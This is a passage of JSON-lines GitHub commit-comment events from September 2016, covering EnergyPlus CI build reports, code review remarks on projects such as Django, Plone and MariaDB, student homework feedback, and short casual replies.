use of the fact that the two lists are already sorted. This is not a merge whose time of execution increases linearly with the length n of the list. Instead, it increases as n*log(n).\r\n- In Q8, you need to import Pandas at the beginning of the code. Also, the code does not give the correct solution. It should look at the *absolute value* of the difference between Goals and Goals Allowed.\r\n\r\n👍 "}},"created_at":"2016-09-17T03:59:24Z"}
{"id":"4577303552","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063005,"position":null,"line":null,"path":null,"commit_id":"1353c0c04d887cbe2318b7a4dd5e5f00de046b73","created_at":"2016-09-17T04:03:00Z","updated_at":"2016-09-17T04:03:00Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1467 of 1787 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-82.09%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-56.97%25-red.svg)</a>\n"}},"created_at":"2016-09-17T04:03:00Z"}
{"id":"4577304523","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063014,"position":null,"line":null,"path":null,"commit_id":"1353c0c04d887cbe2318b7a4dd5e5f00de046b73","created_at":"2016-09-17T04:03:49Z","updated_at":"2016-09-17T04:03:49Z","body":"input_processor_refactor (mbadams5) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-1353c0c04d887cbe2318b7a4dd5e5f00de046b73-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T04:03:49Z"}
{"id":"4577306664","type":"CommitCommentEvent","actor":{"login":"quangvinh2080"},"repo":{"name":"quangvinh2080/vp-movie"},"payload":{"comment":{"id":19063025,"position":null,"line":null,"path":null,"commit_id":"a02528436543eacdc37842b5ba0086e98d62f6c9","created_at":"2016-09-17T04:05:30Z","updated_at":"2016-09-17T04:05:30Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;7BsfP11p&#x2F;4-ch-c-nang\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> CHỨC NĂNG</a>"}},"created_at":"2016-09-17T04:05:30Z"}
{"id":"4577307074","type":"CommitCommentEvent","actor":{"login":"seanupton"},"repo":{"name":"plone/mockup"},"payload":{"comment":{"id":19063026,"position":145,"line":156,"path":"mockup/js/utils.js","commit_id":"6994b72516d8d5d9109c7993a5747c9a77d3cfc6","created_at":"2016-09-17T04:05:54Z","updated_at":"2016-09-17T04:05:54Z","body":"@thet I think data.results will always be undefined here (I cannot see where / how it could be defined scanning the code), and will lead to select2 TypeError every time related items widget users click breadcrumbs (only seen in Firefox, not Chrome).  Need advise on potential ways to address this.  I want to fix, but I am a bit confused as to what Related Items widget needs here."}},"created_at":"2016-09-17T04:05:54Z"}
{"id":"4577307454","type":"CommitCommentEvent","actor":{"login":"DevopsChenna"},"repo":{"name":"DevopsChenna/gitrepo"},"payload":{"comment":{"id":19063028,"position":null,"line":null,"path":null,"commit_id":"71efb3483358e23d0ab617bdfc3063b047e42ca0","created_at":"2016-09-17T04:06:12Z","updated_at":"2016-09-17T04:06:12Z","body":"good"}},"created_at":"2016-09-17T04:06:12Z"}
{"id":"4577307910","type":"CommitCommentEvent","actor":{"login":"ben-manes"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19063033,"position":null,"line":null,"path":null,"commit_id":"601f5e16a3331b9bae0bb6a7f3612ecb68418421","created_at":"2016-09-17T04:06:36Z","updated_at":"2016-09-17T04:06:36Z","body":"Every so often I github search my Java project, I guess that same curiosity for why people Google themselves. I also searched ARC and LIRS, so I stumbled on your issue.\r\n\r\nSince this is in Python, it just occurred to me that you might consider [PyClockPro](https://bitbucket.org/SamiLehtinen/pyclockpro) if you want a pre-baked library. ClockPro is a concurrent friendly variant of LIRS, so it has no movement on reads but may be O(n) on writes. I'm not sure why the author didn't use LIRS in Python, but it served as an example for my simulator. While I think TinyLFU is stronger, that's an off-the-shelf solution you could consider."}},"created_at":"2016-09-17T04:06:36Z"}
{"id":"4577309480","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mjain-1/dsp"},"payload":{"comment":{"id":19063041,"position":null,"line":null,"path":null,"commit_id":"e2c13e6e02abd6e3680a01867fecd910bf4ef67b","created_at":"2016-09-17T04:08:09Z","updated_at":"2016-09-17T04:08:09Z","body":"RE: 05b-python_advanced.md\r\ncc:  @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mjain-1 \r\n\r\nVery nice work on advanced Python!\r\n\r\n👍 "}},"created_at":"2016-09-17T04:08:09Z"}
{"id":"4577310379","type":"CommitCommentEvent","actor":{"login":"johnoel"},"repo":{"name":"msupernaw/June2016-Developers-Workshop"},"payload":{"comment":{"id":19063044,"position":null,"line":null,"path":null,"commit_id":"ca77dae679a994de0c7bdc1f7e16b25602ed861d","created_at":"2016-09-17T04:09:02Z","updated_at":"2016-09-17T04:09:02Z","body":"#"}},"created_at":"2016-09-17T04:09:02Z"}
{"id":"4577312719","type":"CommitCommentEvent","actor":{"login":"LucDemortier"},"repo":{"name":"mjain-1/dsp"},"payload":{"comment":{"id":19063054,"position":null,"line":null,"path":null,"commit_id":"f9c6794e2b30e139a34749971ee3fcc9072386ab","created_at":"2016-09-17T04:11:17Z","updated_at":"2016-09-17T04:11:17Z","body":"RE: 06-linear_algebra.md\r\ncc:  @lucdemortier @reshamametis @aramnath @gfsoileau @julialintern @galvin-mj\r\n\r\nHello @mjain-1 \r\n\r\nPerfect work on linear algebra!\r\n\r\n👍 "}},"created_at":"2016-09-17T04:11:17Z"}
{"id":"4577317445","type":"CommitCommentEvent","actor":{"login":"nguyennam271"},"repo":{"name":"nguyennam271/hello-world"},"payload":{"comment":{"id":19063071,"position":3,"line":1,"path":"README.md","commit_id":"0ca4dbdd73bd01c4321a430b658342e6378a337b","created_at":"2016-09-17T04:15:24Z","updated_at":"2016-09-17T04:15:24Z","body":"ok"}},"created_at":"2016-09-17T04:15:24Z"}
{"id":"4577317504","type":"CommitCommentEvent","actor":{"login":"tinchoz49"},"repo":{"name":"geut/www"},"payload":{"comment":{"id":19063072,"position":5,"line":36,"path":"src/plugins/markdown-handler/index.js","commit_id":"b20e33513687aef36068c3f0638f48e6fab3e36d","created_at":"2016-09-17T04:15:27Z","updated_at":"2016-09-17T04:15:27Z","body":"i like it. functions for everyone! peronism functions!"}},"created_at":"2016-09-17T04:15:27Z"}
{"id":"4577317969","type":"CommitCommentEvent","actor":{"login":"MatheusSouzaCC"},"repo":{"name":"CarlinhosSousaJunior/GestorEstoque"},"payload":{"comment":{"id":19063075,"position":null,"line":null,"path":null,"commit_id":"115acf3317ee8413fdd3a932865aaf61c5462dee","created_at":"2016-09-17T04:15:54Z","updated_at":"2016-09-17T04:15:54Z","body":"MERGE"}},"created_at":"2016-09-17T04:15:54Z"}
{"id":"4577318025","type":"CommitCommentEvent","actor":{"login":"tinchoz49"},"repo":{"name":"geut/www"},"payload":{"comment":{"id":19063076,"position":5,"line":36,"path":"src/plugins/markdown-handler/index.js","commit_id":"b20e33513687aef36068c3f0638f48e6fab3e36d","created_at":"2016-09-17T04:15:57Z","updated_at":"2016-09-17T04:15:57Z","body":"i like it. functions for everyone! peronism functions!"}},"created_at":"2016-09-17T04:15:57Z"}
{"id":"4577321925","type":"CommitCommentEvent","actor":{"login":"jamadden"},"repo":{"name":"zodb/relstorage"},"payload":{"comment":{"id":19063082,"position":null,"line":null,"path":null,"commit_id":"601f5e16a3331b9bae0bb6a7f3612ecb68418421","created_at":"2016-09-17T04:19:44Z","updated_at":"2016-09-17T04:19:44Z","body":"Cool. I'm glad we came to your attention.\r\n\r\nThanks for the pointer. I think I'd seen that implementation before when I was considering a Clock variant. There are some issues though:\r\n\r\n- By its own documentation it's slow, and I can't accept much of a performance regression for reads and writes even if it is more theoretically optimal\r\n- It only supports Python 3 and we have a requirement for python 2.7\r\n- It uses a fixed entry count cache, but we have highly variable entry sizes and need to control by the total size, not counts (similar to weights in Caffeine)\r\n- It's not published on PyPI, so we'd have to vendor the code in, and/or accept maintenance of it (at which point I'd rather maintain my own code 😄 )\r\n\r\nMany of those seem to be \"problems\" for many of the available python caching libraries. (I put \"problems\" in quotes because the use-cases are all different, so RelStorage's needs are probably fairly unique.)"}},"created_at":"2016-09-17T04:19:44Z"}
{"id":"4577328022","type":"CommitCommentEvent","actor":{"login":"habboud"},"repo":{"name":"cedrus-opensource/pyxid"},"payload":{"comment":{"id":19063092,"position":null,"line":null,"path":null,"commit_id":"c84afe985c86b2b8cfa209d3eaf37b6d45fa1763","created_at":"2016-09-17T04:25:00Z","updated_at":"2016-09-17T04:25:00Z","body":"Hello Jon, you are correct, and we are looking into fixing this soon.\n\n\n> On Aug 26, 2016, at 6:37 AM, Jon Peirce <notifications@github.com> wrote:\n> \n> The changes made last year, especially 08b2e15 made by @kkheller aren't reflected in the pypi repository so if someone does:\n> \n> pip install pyxid\n> \n> they get the older buggy version. Could this be updated?\n> Just needs python setup.py bdist_egg sdist upload\n> \n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n\n"}},"created_at":"2016-09-17T04:25:00Z"}
{"id":"4577331157","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063102,"position":null,"line":null,"path":null,"commit_id":"53ae2c8702fe6eb845071710683d6bc9c505c0e4","created_at":"2016-09-17T04:27:54Z","updated_at":"2016-09-17T04:27:54Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: Tests Failed (1781 of 2371 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.12%25-red.svg)</a> \n"}},"created_at":"2016-09-17T04:27:54Z"}
{"id":"4577331289","type":"CommitCommentEvent","actor":{"login":"christineneiman"},"repo":{"name":"kyprizel/testcookie-flash-processor"},"payload":{"comment":{"id":19063103,"position":null,"line":null,"path":null,"commit_id":"1e270ab79862ac749f616839dd16e0184a7867f5","created_at":"2016-09-17T04:28:01Z","updated_at":"2016-09-17T04:28:01Z","body":"[****]( @ #\r\n\r\n> # ePpscneiman)"}},"created_at":"2016-09-17T04:28:01Z"}
{"id":"4577333076","type":"CommitCommentEvent","actor":{"login":"thet"},"repo":{"name":"plone/mockup"},"payload":{"comment":{"id":19063109,"position":145,"line":156,"path":"mockup/js/utils.js","commit_id":"6994b72516d8d5d9109c7993a5747c9a77d3cfc6","created_at":"2016-09-17T04:29:44Z","updated_at":"2016-09-17T04:29:44Z","body":"Huch, I can confirm this. I didn't recognize until now!\r\nNot sure, what to do here either. That would need a deeper debugging session for which I'm not up today anymore..."}},"created_at":"2016-09-17T04:29:44Z"}
{"id":"4577335659","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063116,"position":null,"line":null,"path":null,"commit_id":"53ae2c8702fe6eb845071710683d6bc9c505c0e4","created_at":"2016-09-17T04:31:56Z","updated_at":"2016-09-17T04:31:56Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-17T04:31:56Z"}
{"id":"4577335774","type":"CommitCommentEvent","actor":{"login":"NukeTheMoon"},"repo":{"name":"NukeTheMoon/MineMineMine"},"payload":{"comment":{"id":19063117,"position":null,"line":null,"path":null,"commit_id":"5b67f1e9f4d930b1deaa4a0a5ed0bdca48346d66","created_at":"2016-09-17T04:32:02Z","updated_at":"2016-09-17T04:32:02Z","body":"Also added Rainbow Folders plugin."}},"created_at":"2016-09-17T04:32:02Z"}
{"id":"4577337102","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063122,"position":null,"line":null,"path":null,"commit_id":"dd333cd77417360a57eef9b9fe61c73419801c39","created_at":"2016-09-17T04:33:20Z","updated_at":"2016-09-17T04:33:20Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1764 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-17T04:33:20Z"}
{"id":"4577337946","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063130,"position":null,"line":null,"path":null,"commit_id":"dd333cd77417360a57eef9b9fe61c73419801c39","created_at":"2016-09-17T04:34:09Z","updated_at":"2016-09-17T04:34:09Z","body":"129956421-Scalable-Sizing-HTRad-Heat-Crash (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-dd333cd77417360a57eef9b9fe61c73419801c39-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T04:34:09Z"}
{"id":"4577339980","type":"CommitCommentEvent","actor":{"login":"wcornwell"},"repo":{"name":"cornwell-lab-unsw/jibbon_root_traits"},"payload":{"comment":{"id":19063142,"position":null,"line":null,"path":null,"commit_id":"049c6337e4d3e809a23971666479d15765a8b79a","created_at":"2016-09-17T04:36:01Z","updated_at":"2016-09-17T04:36:01Z","body":"🎆 👍 🎉 "}},"created_at":"2016-09-17T04:36:01Z"}
{"id":"4577340251","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19063144,"position":null,"line":null,"path":null,"commit_id":"2453f84484a0c1e8cd2d637acf92ae0aa93268fe","created_at":"2016-09-17T04:36:17Z","updated_at":"2016-09-17T04:36:17Z","body":"对 Python 自己没有用。"}},"created_at":"2016-09-17T04:36:17Z"}
{"id":"4577341217","type":"CommitCommentEvent","actor":{"login":"janlindstrom"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":19063146,"position":200,"line":4134,"path":"storage/innobase/os/os0file.cc","commit_id":"d6e91d4223d4f0c84b72fb1f88eb04eab459bfc9","created_at":"2016-09-17T04:37:13Z","updated_at":"2016-09-17T04:37:13Z","body":"InnoDB style: \r\n\r\n`if (h) {\r\n     code;\r\n}`"}},"created_at":"2016-09-17T04:37:13Z"}
{"id":"4577341792","type":"CommitCommentEvent","actor":{"login":"sebez"},"repo":{"name":"JabX/autofocus"},"payload":{"comment":{"id":19063151,"position":28,"line":28,"path":"src/router.ts","commit_id":"0469e95f0f44aedf285f7dd152597d7c460765ae","created_at":"2016-09-17T04:37:44Z","updated_at":"2016-09-17T04:37:44Z","body":"Il y a une contrainte sur le type de `currentView` (avoir une propriété `key`).\r\n* Cette contrainte n'intervient pas dans l'implémentation.\r\n* Dans [l'exemple](https://github.com/JabX/autofocus/tree/master/src#module-router), la contrainte n'est pas respectée \r\n"}},"created_at":"2016-09-17T04:37:44Z"}
{"id":"4577343055","type":"CommitCommentEvent","actor":{"login":"fedotov2a"},"repo":{"name":"TimmyGOGO/ProjectPLUS"},"payload":{"comment":{"id":19063157,"position":5,"line":15,"path":"app/src/main/java/com/example/nikolay/projectplus/MainActivity.java","commit_id":"34e18ab4dfae495559b6129e789b3171ae08f65f","created_at":"2016-09-17T04:39:03Z","updated_at":"2016-09-17T04:39:03Z","body":"Not bad :ok_hand: "}},"created_at":"2016-09-17T04:39:03Z"}
{"id":"4577343280","type":"CommitCommentEvent","actor":{"login":"OsmiumKA"},"repo":{"name":"boblovespi/world-sim"},"payload":{"comment":{"id":19063158,"position":null,"line":null,"path":null,"commit_id":"8e60e53a406d0e339b43f92bc694d47d65e8d600","created_at":"2016-09-17T04:39:15Z","updated_at":"2016-09-17T04:39:15Z","body":"https://unity3d.com/learn/tutorials/topics/scripting\r\nhttps://unity3d.com/learn/tutorials?_ga=1.77144726.2083149987.1474084147"}},"created_at":"2016-09-17T04:39:15Z"}
{"id":"4577343561","type":"CommitCommentEvent","actor":{"login":"janlindstrom"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":19063160,"position":null,"line":null,"path":null,"commit_id":"d6e91d4223d4f0c84b72fb1f88eb04eab459bfc9","created_at":"2016-09-17T04:39:31Z","updated_at":"2016-09-17T04:39:31Z","body":"Please ask from @vuvova if you may push this to staging tree before beta."}},"created_at":"2016-09-17T04:39:31Z"}
{"id":"4577344907","type":"CommitCommentEvent","actor":{"login":"petronny"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19063165,"position":null,"line":null,"path":null,"commit_id":"2453f84484a0c1e8cd2d637acf92ae0aa93268fe","created_at":"2016-09-17T04:40:46Z","updated_at":"2016-09-17T04:40:46Z","body":"那用locale.setlocale()呢？会有效吗"}},"created_at":"2016-09-17T04:40:46Z"}
{"id":"4577346325","type":"CommitCommentEvent","actor":{"login":"SedarG"},"repo":{"name":"SedarG/corefx"},"payload":{"comment":{"id":19063170,"position":null,"line":null,"path":null,"commit_id":"1eec49ca2d704f422e0c1c1aa112bdbcd4129c33","created_at":"2016-09-17T04:42:02Z","updated_at":"2016-09-17T04:42:02Z","body":"@ericstj, would you mind taking a look at the latest version of my changes, where I'm now using the feature that you added to packaging.targets (thanks!). \r\nEverything in the nuspec looks ok. That is everything but:\r\n```xml\r\n    <file src=\"E:\\OPEN\\sedarg\\corefx\\bin\\AnyOS.AnyCPU.Debug\\System.Reflection.Extensions\\uap101aot\\System.Reflection.Extensions.dll\" target=\"runtimes/aot/lib/uap10.1\" exclude=\"\" />\r\n    <file src=\"E:\\OPEN\\sedarg\\corefx\\bin\\AnyOS.AnyCPU.Debug\\System.Reflection.Extensions\\uap101aot\\System.Reflection.Extensions.pdb\" target=\"runtimes/aot/lib/uap10.1\" exclude=\"\" />\r\n```\r\nuap101aot asset is cross compiled. Yet it too is nothing but a pure facade. I tried to get rid of the uap101aot asset by removing it from src\\System.Reflection.Extensionons.builds, however I hit an error when I do that:\r\n\r\nSystem.Reflection.Extensions should support API version 4.1.0.0 on UAP,Version=v10.1/win10-x86-aot but System.Reflection.Extensions/runtimes/aot/lib/netcore50/System.Reflect\r\nion.Extensions.dll was found to support 4.0.0.0.\r\n\r\nit looks to me like, runtimes/aot/lib/netcore50 wins over lib/uap101. Is this expected? Is there anything that I can do about it?"}},"created_at":"2016-09-17T04:42:02Z"}
{"id":"4577352891","type":"CommitCommentEvent","actor":{"login":"khanfrd"},"repo":{"name":"khanfrd/android_kernel_xiaomi_kenzo"},"payload":{"comment":{"id":19063184,"position":5,"line":610,"path":"arch/arm64/mm/mmu.c","commit_id":"d9ded6702ac3e0f4be9928ffacb6f8d273db67ad","created_at":"2016-09-17T04:48:04Z","updated_at":"2016-09-17T04:48:04Z","body":"http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.dui0489c/CIHGHHIE.html"}},"created_at":"2016-09-17T04:48:04Z"}
{"id":"4577354054","type":"CommitCommentEvent","actor":{"login":"kskarthik"},"repo":{"name":"mozilla-b2g/b2g-installer"},"payload":{"comment":{"id":19063191,"position":null,"line":null,"path":null,"commit_id":"546af4c2a7c27bd43112b6a3851873c6da2dbe00","created_at":"2016-09-17T04:49:11Z","updated_at":"2016-09-17T04:49:11Z","body":"Nice! "}},"created_at":"2016-09-17T04:49:11Z"}
{"id":"4577354420","type":"CommitCommentEvent","actor":{"login":"ahuraa"},"repo":{"name":"azerothcore/azerothcore-wotlk"},"payload":{"comment":{"id":19063195,"position":null,"line":null,"path":null,"commit_id":"c0590a5cfc2e3a9eff45e893f8e07a678d3aeecc","created_at":"2016-09-17T04:49:31Z","updated_at":"2016-09-17T04:49:31Z","body":"no have cfbg ?\r\n\r\ni can't add crossfactionbg"}},"created_at":"2016-09-17T04:49:31Z"}
{"id":"4577358690","type":"CommitCommentEvent","actor":{"login":"ryanflorence"},"repo":{"name":"ReactTraining/react-router"},"payload":{"comment":{"id":19063221,"position":null,"line":null,"path":null,"commit_id":"ab57fa8554e4d2efaeaf2dd0ab82ea6434bac5b5","created_at":"2016-09-17T04:53:23Z","updated_at":"2016-09-17T04:53:23Z","body":"The material-ui use-case is solid. Wish we could enforce you eventually render an `<a/>`. Really don't want folks rendering `<li>` and stuff w/ this. Guess we can mention that in the docs and be done w/ it."}},"created_at":"2016-09-17T04:53:23Z"}
{"id":"4577359372","type":"CommitCommentEvent","actor":{"login":"rogerdahl"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19063224,"position":29,"line":405,"path":"django/core/urlresolvers.py","commit_id":"31b5275235bac150a54059db0288a19b9e0516c7","created_at":"2016-09-17T04:54:09Z","updated_at":"2016-09-17T04:54:09Z","body":"@aaugustin I'm having an issue with URLs not being properly decoded before being passed into my views when running under WSGI, while things work fine under the dev server. Looking into it, I found this comment, which starts with, ` WSGI provides decoded URLs, without %xx escapes`. This is the opposite of my understanding, so I'm wondering if it's related to the issue I'm having.\r\n\r\nIn my Django app, I have an endpoint where one of the URL path segments is itself a complete URL. This embedded URL has to be percent-encoded, or it would cause the outer URL to become malformed, and Django wouldn't be able to parse it.\r\n\r\nSo it seems like Django needs the percent-encoded URL for parsing and should decode path segments and query parameters before passing them to view functions. Is that correct and, if so, how does it fit with the comment in the code?\r\n\r\nAny feedback much appreciated."}},"created_at":"2016-09-17T04:54:09Z"}
{"id":"4577361111","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063235,"position":null,"line":null,"path":null,"commit_id":"53ae2c8702fe6eb845071710683d6bc9c505c0e4","created_at":"2016-09-17T04:55:56Z","updated_at":"2016-09-17T04:55:56Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-53ae2c8702fe6eb845071710683d6bc9c505c0e4-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.03%25-green.svg)</a>\n"}},"created_at":"2016-09-17T04:55:56Z"}
{"id":"4577362087","type":"CommitCommentEvent","actor":{"login":"jeffreychingchan"},"repo":{"name":"jeffreychingchan/phase-0-tracks"},"payload":{"comment":{"id":19063242,"position":null,"line":null,"path":null,"commit_id":"21a644a8b4b136bc9b1b90e4b4d0208e62edb202","created_at":"2016-09-17T04:57:03Z","updated_at":"2016-09-17T04:57:03Z","body":"@omgmakeme"}},"created_at":"2016-09-17T04:57:03Z"}
{"id":"4577362504","type":"CommitCommentEvent","actor":{"login":"falkobuttler"},"repo":{"name":"narzate06/ios-exercises"},"payload":{"comment":{"id":19063244,"position":1,"line":11,"path":"SwiftExercises.playground/section-1.swift","commit_id":"6f76a5e26f4753c8628be8c66080a155972a43d1","created_at":"2016-09-17T04:57:28Z","updated_at":"2016-09-17T04:57:28Z","body":"You want to change this line. This method is supposed to return a string like \"My favorite cheese is X\", where X is the cheeseName being passed into the method."}},"created_at":"2016-09-17T04:57:28Z"}
{"id":"4577362990","type":"CommitCommentEvent","actor":{"login":"falkobuttler"},"repo":{"name":"narzate06/ios-exercises"},"payload":{"comment":{"id":19063246,"position":5,"line":14,"path":"SwiftExercises.playground/section-1.swift","commit_id":"6f76a5e26f4753c8628be8c66080a155972a43d1","created_at":"2016-09-17T04:57:58Z","updated_at":"2016-09-17T04:57:58Z","body":"Here you just changed the input argument. Instead please change the method contents to create the result string."}},"created_at":"2016-09-17T04:57:58Z"}
{"id":"4577363656","type":"CommitCommentEvent","actor":{"login":"Thrax989"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19063252,"position":null,"line":null,"path":null,"commit_id":"71d9650b4116ecaad202edfbe56397f26677de75","created_at":"2016-09-17T04:58:36Z","updated_at":"2016-09-17T04:58:36Z","body":"Need to change these values are breaking crafting for crafters on the forums "}},"created_at":"2016-09-17T04:58:36Z"}
{"id":"4577366674","type":"CommitCommentEvent","actor":{"login":"lilydjwg"},"repo":{"name":"archlinuxcn/lilac"},"payload":{"comment":{"id":19063265,"position":null,"line":null,"path":null,"commit_id":"2453f84484a0c1e8cd2d637acf92ae0aa93268fe","created_at":"2016-09-17T05:01:22Z","updated_at":"2016-09-17T05:01:22Z","body":"你试试不就不知道了。应该是不会。"}},"created_at":"2016-09-17T05:01:22Z"}
{"id":"4577369746","type":"CommitCommentEvent","actor":{"login":"imsauravsingh"},"repo":{"name":"imsauravsingh/homeo"},"payload":{"comment":{"id":19063278,"position":null,"line":null,"path":null,"commit_id":"e11fe83e4053cfb9112a8daf53c83651f9028ead","created_at":"2016-09-17T05:03:25Z","updated_at":"2016-09-17T05:03:25Z","body":"done finally"}},"created_at":"2016-09-17T05:03:25Z"}
{"id":"4577371313","type":"CommitCommentEvent","actor":{"login":"youyi5617"},"repo":{"name":"youyi5617/homework0"},"payload":{"comment":{"id":19063288,"position":4,"line":13,"path":"README.md","commit_id":"5800e5ac17a7a917fd17337e260524a20c371b5e","created_at":"2016-09-17T05:04:52Z","updated_at":"2016-09-17T05:04:52Z","body":"www.\r\nwwwaaa\r\nyyy"}},"created_at":"2016-09-17T05:04:52Z"}
{"id":"4577373122","type":"CommitCommentEvent","actor":{"login":"nabijaczleweli"},"repo":{"name":"nabijaczleweli/termimage"},"payload":{"comment":{"id":19063295,"position":13,"line":13,"path":"src/error.rs","commit_id":"991a55513867335836ee479cf2a7bc3f36ad8676","created_at":"2016-09-17T05:06:32Z","updated_at":"2016-09-17T05:06:32Z","body":">/u/dpc_pw is me!\r\n\r\nforgive, it was fucking 2:30 am"}},"created_at":"2016-09-17T05:06:32Z"}
